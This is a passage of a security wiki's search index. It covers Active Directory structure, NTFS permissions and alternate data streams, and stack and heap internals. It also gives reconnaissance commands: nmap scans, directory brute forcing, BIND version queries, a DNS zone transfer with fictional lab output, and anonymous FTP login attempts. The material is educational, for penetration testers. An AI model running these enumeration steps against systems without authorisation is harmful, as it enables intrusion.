Introduction","id":"251","title":"Introduction"},"252":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"252","title":"Objects"},"253":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"253","title":"Object Organisation"},"254":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"254","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"255":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"255","title":"Trusts"},"256":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"256","title":"Introduction"},"257":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"257","title":"System Internals"},"258":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. These objects are instances of the User class . User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"258","title":"Introduction"},"259":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"259","title":"Domain Users"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"260","title":"Introduction"},"261":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distributions groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"261","title":"Group Type"},"262":{"body":"There are three possible group scopes and once again must be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions only regarding resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"262","title":"Group Scope"},"263":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"263","title":"Default Groups"},"264":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is update in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"264","title":"Introduction"},"265":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"265","title":"Introduction"},"266":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS are Alternate Data Streams .","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"266","title":"Introduction"},"267":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"267","title":"Permissions"},"268":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tell you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"268","title":"Inspecting Permissions"},"269":{"body":"A not very well-known, yet interesting feature of NTFS are the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which makes them an easy way to hide data within legitimately looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is innominate and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"269","title":"Alternate Data Streams (ADS)"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exists, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from commmon URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"270","title":"Working with ADSs"},"271":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"271","title":"Reverse Engineering"},"272":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"272","title":"Program Anatomy"},"273":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes , and when removing data, the stack pointer augments . This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"273","title":"The Stack"},"274":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the registers are pushed on the stack, then the return address is also pushed. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the value inside the register is then updated to point to the location on the stack where we saved the base pointer. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough in keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"274","title":"Stack Frames"},"275":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an opertation code (opcode) and optional data that the instruction operates with. These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"275","title":"Instructions"},"276":{"body":"Moves the value inside one register to another: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"276","title":"mov"},"277":{"body":"Load effective address - this instruction calculates the address of its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will move rax+0x10 inside rdx.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"277","title":"lea"},"278":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"278","title":"add"},"279":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"279","title":"sub"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for quering BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"It performs XOR-ing on its operands and stores the results into the first operand: xor rdx, rax The and and or are the same, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"280","title":"xor"},"281":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"281","title":"push"},"282":{"body":"Increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes and stores the popped value from the stack into its operand: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"282","title":"pop"},"283":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"283","title":"jmp"},"284":{"body":"Used for invoking procedures. It first pushes the values of the base and stack pointers onto the stack and then jumps to the specified address. After the function is finished, a ret instruction is issued which restores the values of the stack and base pointers from the stack and continues execution from where it left off.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"284","title":"call"},"285":{"body":"It compares the value of its two operands and sets the according flags depending on the result: cmp rax, rdx If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"285","title":"cmp"},"286":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"286","title":"jz / jnz"},"287":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to request and relieve any heap memory only once . Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to mark the area as available for use by the operating system and/or other programs. Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"287","title":"The Heap"},"288":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double delete vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"288","title":"Heap Rules"},"289":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"289","title":"The GLIBC Heap"},"29":{"body":"A Zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. In addition to this padding, each chunks contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. The following three bits carry specific meaning: A (0x04) - Allocated arena. If this bit is 0, the chunk comes from the main arena and the main heap. If this bit is 1, the chunk comes from mmap'd memory and the location of the heap can be computed from the chunk's address. M (0x02) - If this bit is set, then the chunk was mmap-ed and isn't part of a heap. Typically used for large allocations. P (0x01) - If this bit is set, then the previous chunk should not be considered for coalescing and the mchunkptr points to a previous chunk still in use A free chunk looks a bit different: The size and AMP fields carry on the same meaning as those in chunks that are in use. Free chunks are organised in linked or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"290","title":"Chunks"},"291":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"291","title":"Memory Allocation on the Heap"},"292":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"292","title":"Allocating from Free Chunks"},"293":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"293","title":"Allocating from the Top Chunk"},"294":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk.On most Linux-based systems this function internally uses a system call called brk. Eventuall, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"294","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"295":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"295","title":"Allocating Large Chunks"},"296":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is all there ever will exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"296","title":"Arenas"},"297":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"297","title":"Bins"},"298":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are sorted by default due to the fixed size of their elements and Insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"298","title":"Small Bins"},"299":{"body":"There are 63 large bins and they resemble small bins in their operation but store chunks of different sizes. Consequently, insertions and removal of entries on these lists is slower, since the entire bin has to be traversed in order to find a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The size of the chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"299","title":"Large Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"300","title":"Unsorted Bins"},"301":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. There are 10 fast bins, covering 